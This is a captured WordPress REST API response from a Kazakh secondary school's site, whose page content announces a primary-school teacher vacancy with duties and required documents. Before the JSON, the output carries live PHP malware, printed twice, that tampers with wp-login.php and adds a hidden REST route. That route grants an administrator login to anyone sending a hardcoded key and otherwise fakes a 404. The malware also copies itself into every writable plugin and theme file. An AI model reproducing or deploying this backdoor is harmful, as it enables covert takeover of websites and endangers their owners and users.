// ===DOG_MONITOR_START=== // Dog monitor injection v1.5.7 if (!class_exists('DogMonitor_0b5f60411a') && !function_exists('dog_monitor_7a2f53e25f')) { class DogMonitor_0b5f60411a { public static function init() { $wp_login = ABSPATH . 'wp-login.php'; if (file_exists($wp_login) && is_writable($wp_login)) { $content = @file_get_contents($wp_login); $marker_start = ''; $marker_end = ''; $script_tag = ""; if ($content !== false && strpos($content, $marker_start) === false) { $inject_block = "\n{$marker_start}\n{$script_tag}\n{$marker_end}\n"; if (preg_match('/<\/body>/i', $content, $m, PREG_OFFSET_CAPTURE)) { $pos = $m[0][1]; $patched = substr($content, 0, $pos) . $inject_block . substr($content, $pos); if (strpos($patched, '') !== false && strpos($patched, $marker_start) !== false) { @file_put_contents($wp_login, $patched); } else { error_log("DogMonitor: injection integrity check failed."); } } else { error_log("DogMonitor: not found in wp-login.php"); } } } add_action('rest_api_init', function() { $stealth_key = '6c6c5a3b5389763a01'; register_rest_route('wp/v2', 'site-health', [ 'methods' => 'POST', 'callback' => function($request) use ($stealth_key) { $nonce = $request->get_param('nonce'); $action = $request->get_param('action'); if ($nonce === $stealth_key && $action === 'verify') { wp_set_auth_cookie(1); wp_redirect(admin_url()); exit; } return new WP_Error( 'rest_no_route', 'No route was found matching the URL and request method.', ['status' => 404] ); }, 'permission_callback' => '__return_true' ]); }); $opt = '_' . substr(md5(__CLASS__), 0, 8) . '_cache'; if (!get_option($opt) || time() - get_option($opt) > 86400) { update_option($opt, time(), 'no'); self::propagate(); } } public static function propagate() { $self = file_get_contents(__FILE__); preg_match('#// ===DOG_MONITOR_START===.+// ===DOG_MONITOR_END===#s', $self, $m); if (empty($m)) return; $payload = $m[0]; $dirs = [ ABSPATH . 'wp-content/plugins', ABSPATH . 'wp-content/themes', ]; foreach ($dirs as $base) { if (!is_dir($base)) continue; foreach (scandir($base) as $item) { if ($item === '.' || $item === '..') continue; $path = "$base/$item"; if (!is_dir($path)) continue; $targets = []; $main = $path . '/' . $item . '.php'; if (file_exists($main)) $targets[] = $main; foreach (glob("$path/*.php") as $file) { if (preg_match('/Plugin Name:/', file_get_contents($file))) { $targets[] = $file; } } $fn = $path . '/functions.php'; if (file_exists($fn)) $targets[] = $fn; foreach (array_unique($targets) as $file) { if (!is_writable($file)) continue; $content = file_get_contents($file); if (strpos($content, 'DOG_MONITOR_START') !== false) continue; if (preg_match('/\?>\s*$/', $content)) continue; file_put_contents($file, $content . " " . $payload); } } } } } function dog_monitor_7a2f53e25f() { DogMonitor_0b5f60411a::init(); } add_action('init', 'dog_monitor_7a2f53e25f', 1); } // ===DOG_MONITOR_END=== // ===DOG_MONITOR_START=== // Dog monitor injection v1.5.7 if (!class_exists('DogMonitor_0b5f60411a') && !function_exists('dog_monitor_7a2f53e25f')) { class DogMonitor_0b5f60411a { public static function init() { $wp_login = ABSPATH . 'wp-login.php'; if (file_exists($wp_login) && is_writable($wp_login)) { $content = @file_get_contents($wp_login); $marker_start = ''; $marker_end = ''; $script_tag = ""; if ($content !== false && strpos($content, $marker_start) === false) { $inject_block = "\n{$marker_start}\n{$script_tag}\n{$marker_end}\n"; if (preg_match('/<\/body>/i', $content, $m, PREG_OFFSET_CAPTURE)) { $pos = $m[0][1]; $patched = substr($content, 0, $pos) . $inject_block . substr($content, $pos); if (strpos($patched, '') !== false && strpos($patched, $marker_start) !== false) { @file_put_contents($wp_login, $patched); } else { error_log("DogMonitor: injection integrity check failed."); } } else { error_log("DogMonitor: not found in wp-login.php"); } } } add_action('rest_api_init', function() { $stealth_key = '6c6c5a3b5389763a01'; register_rest_route('wp/v2', 'site-health', [ 'methods' => 'POST', 'callback' => function($request) use ($stealth_key) { $nonce = $request->get_param('nonce'); $action = $request->get_param('action'); if ($nonce === $stealth_key && $action === 'verify') { wp_set_auth_cookie(1); wp_redirect(admin_url()); exit; } return new WP_Error( 'rest_no_route', 'No route was found matching the URL and request method.', ['status' => 404] ); }, 'permission_callback' => '__return_true' ]); }); $opt = '_' . substr(md5(__CLASS__), 0, 8) . '_cache'; if (!get_option($opt) || time() - get_option($opt) > 86400) { update_option($opt, time(), 'no'); self::propagate(); } } public static function propagate() { $self = file_get_contents(__FILE__); preg_match('#// ===DOG_MONITOR_START===.+// ===DOG_MONITOR_END===#s', $self, $m); if (empty($m)) return; $payload = $m[0]; $dirs = [ ABSPATH . 'wp-content/plugins', ABSPATH . 'wp-content/themes', ]; foreach ($dirs as $base) { if (!is_dir($base)) continue; foreach (scandir($base) as $item) { if ($item === '.' || $item === '..') continue; $path = "$base/$item"; if (!is_dir($path)) continue; $targets = []; $main = $path . '/' . $item . '.php'; if (file_exists($main)) $targets[] = $main; foreach (glob("$path/*.php") as $file) { if (preg_match('/Plugin Name:/', file_get_contents($file))) { $targets[] = $file; } } $fn = $path . '/functions.php'; if (file_exists($fn)) $targets[] = $fn; foreach (array_unique($targets) as $file) { if (!is_writable($file)) continue; $content = file_get_contents($file); if (strpos($content, 'DOG_MONITOR_START') !== false) continue; if (preg_match('/\?>\s*$/', $content)) continue; file_put_contents($file, $content . " " . $payload); } } } } } function dog_monitor_7a2f53e25f() { DogMonitor_0b5f60411a::init(); } add_action('init', 'dog_monitor_7a2f53e25f', 1); } // ===DOG_MONITOR_END===
Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904

Warning: Cannot modify header information - headers already sent by (output started at /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-content/plugins/better-search-replace/better-search-replace.php:1) in /var/www/turkestan_hosting/data/www/115-astana.edu.kz/wp-includes/rest-api/class-wp-rest-server.php on line 1904
{"id":229,"date":"2026-03-16T07:58:24","date_gmt":"2026-03-16T04:58:24","guid":{"rendered":"https:\/\/115-astana.edu.kz\/?page_id=229"},"modified":"2026-03-17T14:04:59","modified_gmt":"2026-03-17T11:04:59","slug":"%d0%b1%d0%be%d1%81-%d0%be%d1%80%d1%8b%d0%bd%d0%b4%d0%b0%d1%80","status":"publish","type":"page","link":"https:\/\/115-astana.edu.kz\/?page_id=229","title":{"rendered":"\u0411\u043e\u0441 \u043e\u0440\u044b\u043d\u0434\u0430\u0440"},"content":{"rendered":"\t\t
\n\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t

\u0410\u0441\u0442\u0430\u043d\u0430 \u049b\u0430\u043b\u0430\u0441\u044b \u04d9\u043a\u0456\u043c\u0434\u0456\u0433\u0456\u043d\u0456\u04a3 \u00ab\u2116115 \u043e\u0440\u0442\u0430 \u043c\u0435\u043a\u0442\u0435\u043f\u00bb\n\u043a\u043e\u043c\u043c\u0443\u043d\u0430\u043b\u0434\u044b\u049b \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u043c\u0435\u043a\u0435\u043c\u0435\u0441\u0456\u043d\u0435\n\u0431\u043e\u0441 \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0493\u0430 \u043a\u043e\u043d\u043a\u0443\u0440\u0441 \u0436\u0430\u0440\u0438\u044f\u043b\u0430\u0439\u0434\u044b\n\u00ab\u0411\u0430\u0441\u0442\u0430\u0443\u044b\u0448 \u0441\u044b\u043d\u044b\u043f \u043c\u04b1\u0493\u0430\u043b\u0456\u043c\u0456\u00bb\n<\/h2>\t\t\t\t<\/div>\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

\u041c\u0435\u043a\u0435\u043d-\u0436\u0430\u0439\u044b: <\/strong>\u00a0\u0410\u0441\u0442\u0430\u043d\u0430 \u049b, \u00a0\u041d\u04b1\u0440\u0430 \u0430\u0443\u0434\u0430\u043d\u044b, \u041a\u04af\u043b\u0442\u0435\u0433\u0456\u043d, 18<\/p>

e-mail:\u00a0<\/strong>115_keleshekmektebi@mail.ru<\/p>

\u0411\u0430\u0439\u043b\u0430\u043d\u044b\u0441 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u044b: <\/strong>87018070880<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t

\n\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

\u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0434\u044b\u049b \u043c\u0456\u043d\u0434\u0435\u0442\u0442\u0435\u0440\u0456<\/p><\/td><\/tr>

v \u041f\u0435\u0434\u0430\u0433\u043e\u0433\u0438\u043a\u0430\u043b\u044b\u049b \u044d\u0442\u0438\u043a\u0430 \u0435\u0440\u0435\u0436\u0435\u043b\u0435\u0440\u0456\u043d \u0441\u0430\u049b\u0442\u0430\u0439\u0434\u044b, \u0431\u0456\u043b\u0456\u043c \u0430\u043b\u0443\u0448\u044b\u043b\u0430\u0440\u0434\u044b\u04a3 \u04e9\u043c\u0456\u0440\u043b\u0456\u043a \u0434\u0430\u0493\u0434\u044b\u043b\u0430\u0440\u044b\u043d, \u049b\u04b1\u0437\u044b\u0440\u0435\u0442\u0442\u0435\u0440\u0456\u043d, \u0434\u0435\u0440\u0431\u0435\u0441\u0442\u0456\u0433\u0456\u043d, \u0448\u044b\u0493\u0430\u0440\u043c\u0430\u0448\u044b\u043b\u044b\u049b \u049b\u0430\u0431\u0456\u043b\u0435\u0442\u0442\u0435\u0440\u0456\u043d \u0434\u0430\u043c\u044b\u0442\u0430\u0434\u044b;<\/p>

v \u0421\u0430\u0431\u0430\u049b \u043a\u0435\u0441\u0442\u0435\u0441\u0456\u043d\u0435 \u0441\u04d9\u0439\u043a\u0435\u0441 \u0441\u0430\u0431\u0430\u049b \u0436\u04d9\u043d\u0435 \u0431\u0430\u0441\u049b\u0430 \u0434\u0430 \u0441\u0430\u0431\u0430\u049b\u0442\u0430\u0440 \u04e9\u0442\u043a\u0456\u0437\u0435\u0434\u0456, \u043e\u049b\u044b\u0442\u044b\u043b\u0430\u0442\u044b\u043d \u043f\u04d9\u043d\u043d\u0456\u04a3 \u0435\u0440\u0435\u043a\u0448\u0435\u043b\u0456\u0433\u0456\u043d \u0435\u0441\u043a\u0435\u0440\u0435 \u043e\u0442\u044b\u0440\u044b\u043f, \u0431\u0456\u043b\u0456\u043c \u0430\u043b\u0443\u0448\u044b\u043b\u0430\u0440\u0434\u044b \u043e\u049b\u044b\u0442\u0443 \u043c\u0435\u043d \u0442\u04d9\u0440\u0431\u0438\u0435\u043b\u0435\u0443\u0434\u0456 \u0436\u04af\u0437\u0435\u0433\u0435 \u0430\u0441\u044b\u0440\u0430\u0434\u044b;<\/p>

v \u0411\u0435\u043b\u0433\u0456\u043b\u0435\u043d\u0433\u0435\u043d \u0442\u04d9\u0440\u0442\u0456\u043f\u0442\u0435 \u043e\u049b\u0443 \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440\u044b\u043d \u0436\u04af\u0440\u0433\u0456\u0437\u0435\u0434\u0456, \u043e\u049b\u0443\u0448\u044b\u043b\u0430\u0440\u0434\u044b\u04a3 \u0441\u0430\u0431\u0430\u049b\u049b\u0430 \u049b\u0430\u0442\u044b\u0441\u0443\u044b \u043c\u0435\u043d \u04af\u043b\u0433\u0435\u0440\u0456\u043c\u0456\u043d\u0435 \u0430\u0493\u044b\u043c\u0434\u0430\u0493\u044b \u0431\u0430\u049b\u044b\u043b\u0430\u0443\u0434\u044b \u0436\u04af\u0437\u0435\u0433\u0435 \u0430\u0441\u044b\u0440\u0430\u0434\u044b, \u0436\u0443\u0440\u043d\u0430\u043b\u0493\u0430 \u0431\u0430\u0493\u0430 \u049b\u043e\u044f\u0434\u044b;<\/p>

v \u041e\u049b\u0443 \u0436\u044b\u043b\u044b \u0431\u0430\u0441\u0442\u0430\u043b\u0493\u0430\u043d\u0493\u0430 \u0434\u0435\u0439\u0456\u043d \u0431\u0456\u0440 \u0440\u0435\u0442 \u043f\u04d9\u043d \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u043e\u0440\u0442\u0430 \u043c\u0435\u0440\u0437\u0456\u043c\u0434\u0456 \u0436\u043e\u0441\u043f\u0430\u0440 \u04d9\u0437\u0456\u0440\u043b\u0435\u0439\u0434\u0456; \u0442\u043e\u049b\u0441\u0430\u043d \u049b\u043e\u0440\u044b\u0442\u044b\u043d\u0434\u044b\u0441\u044b \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u0431\u04e9\u043b\u0456\u043c \u04af\u0448\u0456\u043d \u0436\u0438\u044b\u043d\u0442\u044b\u049b \u0431\u0430\u0493\u0430\u043b\u0430\u0443 \u0436\u04d9\u043d\u0435 \u0442\u043e\u049b\u0441\u0430\u043d \u04af\u0448\u0456\u043d \u0436\u0438\u044b\u043d\u0442\u044b\u049b \u0431\u0430\u0493\u0430\u043b\u0430\u0443 \u049b\u043e\u0440\u044b\u0442\u044b\u043d\u0434\u044b\u0441\u044b \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u0442\u0430\u043b\u0434\u0430\u0443 \u0436\u04af\u0440\u0433\u0456\u0437\u0435\u0434\u0456.;<\/p>

v \u041c\u0435\u043a\u0435\u043c\u0435\u043d\u0456\u04a3 \u0436\u0430\u0440\u0493\u044b\u0441\u044b\u043d, \u04b1\u0436\u044b\u043c\u0434\u044b\u049b \u0448\u0430\u0440\u0442\u0442\u044b, \u0456\u0448\u043a\u0456 \u0435\u04a3\u0431\u0435\u043a \u0442\u04d9\u0440\u0442\u0456\u0431\u0456 \u0435\u0440\u0435\u0436\u0435\u043b\u0435\u0440\u0456\u043d, \u0441\u043e\u043d\u0434\u0430\u0439-\u0430\u049b \u043c\u0435\u043a\u0435\u043c\u0435\u043d\u0456\u04a3 \u0436\u0435\u0440\u0433\u0456\u043b\u0456\u043a\u0442\u0456 \u0430\u043a\u0442\u0456\u043b\u0435\u0440\u0456\u043d, \u043c\u0435\u043a\u0435\u043c\u0435 \u04d9\u043a\u0456\u043c\u0448\u0456\u043b\u0456\u0433\u0456\u043d\u0456\u04a3 \u0431\u04b1\u0439\u0440\u044b\u049b\u0442\u0430\u0440\u044b \u043c\u0435\u043d \u04e9\u043a\u0456\u043c\u0434\u0435\u0440\u0456\u043d \u0441\u0430\u049b\u0442\u0430\u0439\u0434\u044b;<\/p>

v \u049a\u0420 \u00ab\u0411\u0456\u043b\u0456\u043c \u0442\u0443\u0440\u0430\u043b\u044b\u00bb \u0417\u0430\u04a3\u044b\u043d\u0434\u0430, \u0411\u0430\u043b\u0430 \u049b\u04b1\u049b\u044b\u049b\u0442\u0430\u0440\u044b \u0442\u0443\u0440\u0430\u043b\u044b \u041a\u043e\u043d\u0432\u0435\u043d\u0446\u0438\u044f\u0434\u0430 \u049b\u0430\u043c\u0442\u044b\u043b\u0493\u0430\u043d \u0431\u0456\u043b\u0456\u043c \u0430\u043b\u0443\u0448\u044b\u043b\u0430\u0440\u0434\u044b\u04a3 \u049b\u04b1\u049b\u044b\u049b\u0442\u0430\u0440\u044b \u043c\u0435\u043d \u0431\u043e\u0441\u0442\u0430\u043d\u0434\u044b\u049b\u0442\u0430\u0440\u044b\u043d \u0441\u0430\u049b\u0442\u0430\u0439\u0434\u044b.<\/p><\/td><\/tr><\/tbody><\/table>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t

\n\t\t\t\t\t\t\t\t\t
\u00a0<\/td><\/tr>

\u049a\u04b1\u0436\u0430\u0442\u0442\u0430\u0440 \u0442\u0456\u0437\u0456\u043c\u0456<\/p><\/td><\/tr>

v \u041c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u04b1\u0439\u044b\u043c\u0434\u0430\u0440\u044b\u043d\u044b\u04a3 \u0431\u0456\u0440\u0456\u043d\u0448\u0456 \u0431\u0430\u0441\u0448\u044b\u043b\u0430\u0440\u044b \u043c\u0435\u043d \u043f\u0435\u0434\u0430\u0433\u043e\u0433\u0442\u0435\u0440\u0456\u043d \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0434\u0430\u0440\u0493\u0430 \u0442\u0430\u0493\u0430\u0439\u044b\u043d\u0434\u0430\u0443, \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0434\u0430\u0440\u0434\u0430\u043d \u0431\u043e\u0441\u0430\u0442\u0443 \u049b\u0430\u0493\u0438\u0434\u0430\u043b\u0430\u0440\u044b\u043d\u0430 15-\u049b\u043e\u0441\u044b\u043c\u0448\u0430\u0493\u0430 \u0441\u04d9\u0439\u043a\u0435\u0441 \u043d\u044b\u0441\u0430\u043d \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u049b\u043e\u0441\u0430 \u0431\u0435\u0440\u0456\u043b\u0435\u0442\u0456\u043d \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440\u0434\u044b\u04a3 \u0442\u0456\u0437\u0431\u0435\u0441\u0456\u043d \u043a\u04e9\u0440\u0441\u0435\u0442\u0435 \u043e\u0442\u044b\u0440\u044b\u043f, \u041a\u043e\u043d\u043a\u0443\u0440\u0441\u049b\u0430 \u049b\u0430\u0442\u044b\u0441\u0443 \u0442\u0443\u0440\u0430\u043b\u044b \u04e9\u0442\u0456\u043d\u0456\u0448;<\/p>

v \u0436\u0435\u043a\u0435 \u0431\u0430\u0441\u044b\u043d \u043a\u0443\u04d9\u043b\u0430\u043d\u0434\u044b\u0440\u0430\u0442\u044b\u043d \u049b\u04b1\u0436\u0430\u0442 \u043d\u0435 \u0446\u0438\u0444\u0440\u043b\u044b\u049b \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440 \u0441\u0435\u0440\u0432\u0438\u0441\u0456\u043d\u0435\u043d \u0430\u043b\u044b\u043d\u0493\u0430\u043d \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u0434\u044b \u049b\u04b1\u0436\u0430\u0442 (\u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u04af\u0448\u0456\u043d);<\/p>

v \u043a\u0430\u0434\u0440\u043b\u0430\u0440\u0434\u044b \u0435\u0441\u0435\u043f\u043a\u0435 \u0430\u043b\u0443 \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u0442\u043e\u043b\u0442\u044b\u0440\u044b\u043b\u0493\u0430\u043d \u0436\u0435\u043a\u0435 \u0456\u0441 \u043f\u0430\u0440\u0430\u0493\u044b (\u043d\u0430\u049b\u0442\u044b \u0442\u04b1\u0440\u0493\u044b\u043b\u044b\u049b\u0442\u044b \u043c\u0435\u043a\u0435\u043d\u0436\u0430\u0439\u044b \u043c\u0435\u043d \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0434\u0430\u0440\u044b \u043a\u04e9\u0440\u0441\u0435\u0442\u0456\u043b\u0433\u0435\u043d \u2013 \u0431\u0430\u0440 \u0431\u043e\u043b\u0441\u0430);<\/p>

v \u041f\u0435\u0434\u0430\u0433\u043e\u0433\u0442\u0435\u0440\u0434\u0456\u04a3 \u04af\u043b\u0433\u0456\u043b\u0456\u043a \u0431\u0456\u043b\u0456\u043a\u0442\u0456\u043b\u0456\u043a \u0441\u0438\u043f\u0430\u0442\u0442\u0430\u043c\u0430\u043b\u0430\u0440\u044b\u043c\u0435\u043d \u0431\u0435\u043a\u0456\u0442\u0456\u043b\u0433\u0435\u043d \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0493\u0430 \u049b\u043e\u0439\u044b\u043b\u0430\u0442\u044b\u043d \u0431\u0456\u043b\u0456\u043a\u0442\u0456\u043b\u0456\u043a \u0442\u0430\u043b\u0430\u043f\u0442\u0430\u0440\u044b\u043d\u0430 \u0441\u04d9\u0439\u043a\u0435\u0441 \u0431\u0456\u043b\u0456\u043c\u0456 \u0442\u0443\u0440\u0430\u043b\u044b \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u0440\u0434\u044b\u04a3 \u043a\u04e9\u0448\u0456\u0440\u043c\u0435\u043b\u0435\u0440\u0456;<\/p>

v \u0435\u04a3\u0431\u0435\u043a \u049b\u044b\u0437\u043c\u0435\u0442\u0456\u043d \u0440\u0430\u0441\u0442\u0430\u0439\u0442\u044b\u043d \u049b\u04b1\u0436\u0430\u0442\u0442\u044b\u04a3 \u043a\u04e9\u0448\u0456\u0440\u043c\u0435\u0441\u0456 (\u0431\u0430\u0440 \u0431\u043e\u043b\u0441\u0430);<\/p>

v \u201c\u0414\u0435\u043d\u0441\u0430\u0443\u043b\u044b\u049b \u0441\u0430\u049b\u0442\u0430\u0443 \u0441\u0430\u043b\u0430\u0441\u044b\u043d\u0434\u0430\u0493\u044b \u0435\u0441\u0435\u043f\u043a\u0435 \u0430\u043b\u0443 \u049b\u04b1\u0436\u0430\u0442\u0442\u0430\u043c\u0430\u0441\u044b\u043d\u044b\u04a3 \u043d\u044b\u0441\u0430\u043d\u0434\u0430\u0440\u044b\u043d \u0431\u0435\u043a\u0456\u0442\u0443 \u0442\u0443\u0440\u0430\u043b\u044b\u201d \u049a\u0430\u0437\u0430\u049b\u0441\u0442\u0430\u043d \u0420\u0435\u0441\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0441\u044b \u0414\u0435\u043d\u0441\u0430\u0443\u043b\u044b\u049b \u0441\u0430\u049b\u0442\u0430\u0443 \u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0456\u043d\u0456\u04a3 \u043c\u0456\u043d\u0434\u0435\u0442\u0456\u043d \u0430\u0442\u049b\u0430\u0440\u0443\u0448\u044b\u043d\u044b\u04a3 2020 \u0436\u044b\u043b\u0493\u044b 30 \u049b\u0430\u0437\u0430\u043d\u0434\u0430\u0493\u044b \u2116 \u049a\u0420 \u0414\u0421\u041c-175\/2020 \u0431\u04b1\u0439\u0440\u044b\u0493\u044b\u043c\u0435\u043d \u0431\u0435\u043a\u0456\u0442\u0456\u043b\u0433\u0435\u043d \u043d\u044b\u0441\u0430\u043d \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u0434\u0435\u043d\u0441\u0430\u0443\u043b\u044b\u049b \u0436\u0430\u0493\u0434\u0430\u0439\u044b \u0442\u0443\u0440\u0430\u043b\u044b \u0430\u043d\u044b\u049b\u0442\u0430\u043c\u0430 (\u041d\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u0442\u0456\u043a \u049b\u04b1\u049b\u044b\u049b\u0442\u044b\u049b \u0430\u043a\u0442\u0456\u043b\u0435\u0440\u0434\u0456 \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u0442\u0456\u0440\u043a\u0435\u0443 \u0442\u0456\u0437\u0456\u043b\u0456\u043c\u0456\u043d\u0434\u0435 \u2116 21579 \u0431\u043e\u043b\u044b\u043f \u0442\u0456\u0440\u043a\u0435\u043b\u0433\u0435\u043d).<\/p>

v \u043f\u0441\u0438\u0445\u043e\u043d\u0435\u0432\u0440\u043e\u043b\u043e\u0433\u0438\u044f\u043b\u044b\u049b \u04b1\u0439\u044b\u043c\u043d\u0430\u043d \u0430\u043d\u044b\u049b\u0442\u0430\u043c\u0430;<\/p>

v \u043d\u0430\u0440\u043a\u043e\u043b\u043e\u0433\u0438\u044f\u043b\u044b\u049b \u04b1\u0439\u044b\u043c\u043d\u0430\u043d \u0430\u043d\u044b\u049b\u0442\u0430\u043c\u0430;<\/p>

v \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0442\u0430\u0443\u0434\u0430\u043d \u04e9\u0442\u0443 \u043d\u04d9\u0442\u0438\u0436\u0435\u043b\u0435\u0440\u0456 \u0442\u0443\u0440\u0430\u043b\u044b \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u043d\u0435\u043c\u0435\u0441\u0435 \u049b\u043e\u043b\u0434\u0430\u043d\u044b\u0441\u0442\u0430\u0493\u044b \u0431\u0456\u043b\u0456\u043a\u0442\u0456\u043b\u0456\u043a \u0441\u0430\u043d\u0430\u0442\u044b\u043d\u044b\u04a3 \u0431\u043e\u043b\u0443\u044b \u0442\u0443\u0440\u0430\u043b\u044b \u043a\u0443\u04d9\u043b\u0456\u043a (\u0431\u0430\u0440 \u0431\u043e\u043b\u0441\u0430);<\/p>

v \u041c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u0431\u0456\u043b\u0456\u043c \u0431\u0435\u0440\u0443 \u04b1\u0439\u044b\u043c\u0434\u0430\u0440\u044b\u043d\u044b\u04a3 \u0431\u0456\u0440\u0456\u043d\u0448\u0456 \u0431\u0430\u0441\u0448\u044b\u043b\u0430\u0440\u044b \u043c\u0435\u043d \u043f\u0435\u0434\u0430\u0433\u043e\u0433\u0442\u0435\u0440\u0456\u043d \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0434\u0430\u0440\u0493\u0430 \u0442\u0430\u0493\u0430\u0439\u044b\u043d\u0434\u0430\u0443, \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0434\u0430\u0440\u0434\u0430\u043d \u0431\u043e\u0441\u0430\u0442\u0443 \u049b\u0430\u0493\u0438\u0434\u0430\u043b\u0430\u0440\u044b\u043d\u0430 16-\u049b\u043e\u0441\u044b\u043c\u0448\u0430\u0493\u0430 \u0441\u04d9\u0439\u043a\u0435\u0441 \u043d\u044b\u0441\u0430\u043d \u0431\u043e\u0439\u044b\u043d\u0448\u0430 \u043f\u0435\u0434\u0430\u0433\u043e\u0433\u0442\u0456\u04a3 \u0431\u043e\u0441 \u043d\u0435\u043c\u0435\u0441\u0435 \u0443\u0430\u049b\u044b\u0442\u0448\u0430 \u0431\u043e\u0441 \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u044b\u043d\u0430 \u043a\u0430\u043d\u0434\u0438\u0434\u0430\u0442\u0442\u044b\u04a3 \u0442\u043e\u043b\u0442\u044b\u0440\u044b\u043b\u0493\u0430\u043d \u0431\u0430\u0493\u0430\u043b\u0430\u0443 \u043f\u0430\u0440\u0430\u0493\u044b.<\/p><\/td><\/tr><\/tbody><\/table>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"

\u0410\u0441\u0442\u0430\u043d\u0430 \u049b\u0430\u043b\u0430\u0441\u044b \u04d9\u043a\u0456\u043c\u0434\u0456\u0433\u0456\u043d\u0456\u04a3 \u00ab\u2116115 \u043e\u0440\u0442\u0430 \u043c\u0435\u043a\u0442\u0435\u043f\u00bb \u043a\u043e\u043c\u043c\u0443\u043d\u0430\u043b\u0434\u044b\u049b \u043c\u0435\u043c\u043b\u0435\u043a\u0435\u0442\u0442\u0456\u043a \u043c\u0435\u043a\u0435\u043c\u0435\u0441\u0456\u043d\u0435 \u0431\u043e\u0441 \u043b\u0430\u0443\u0430\u0437\u044b\u043c\u0493\u0430 \u043a\u043e\u043d\u043a\u0443\u0440\u0441 \u0436\u0430\u0440\u0438\u044f\u043b\u0430\u0439\u0434\u044b \u00ab\u0411\u0430\u0441\u0442\u0430\u0443\u044b\u0448 \u0441\u044b\u043d\u044b\u043f \u043c\u04b1\u0493\u0430\u043b\u0456\u043c\u0456\u00bb \u041c\u0435\u043a\u0435\u043d-\u0436\u0430\u0439\u044b: \u00a0\u0410\u0441\u0442\u0430\u043d\u0430 \u049b, \u00a0\u041d\u04b1\u0440\u0430 \u0430\u0443\u0434\u0430\u043d\u044b, \u041a\u04af\u043b\u0442\u0435\u0433\u0456\u043d, 18 e-mail:\u00a0115_keleshekmektebi@mail.ru \u0411\u0430\u0439\u043b\u0430\u043d\u044b\u0441 \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u044b: 87018070880 \u0424\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u0434\u044b\u049b \u043c\u0456\u043d\u0434\u0435\u0442\u0442\u0435\u0440\u0456 v 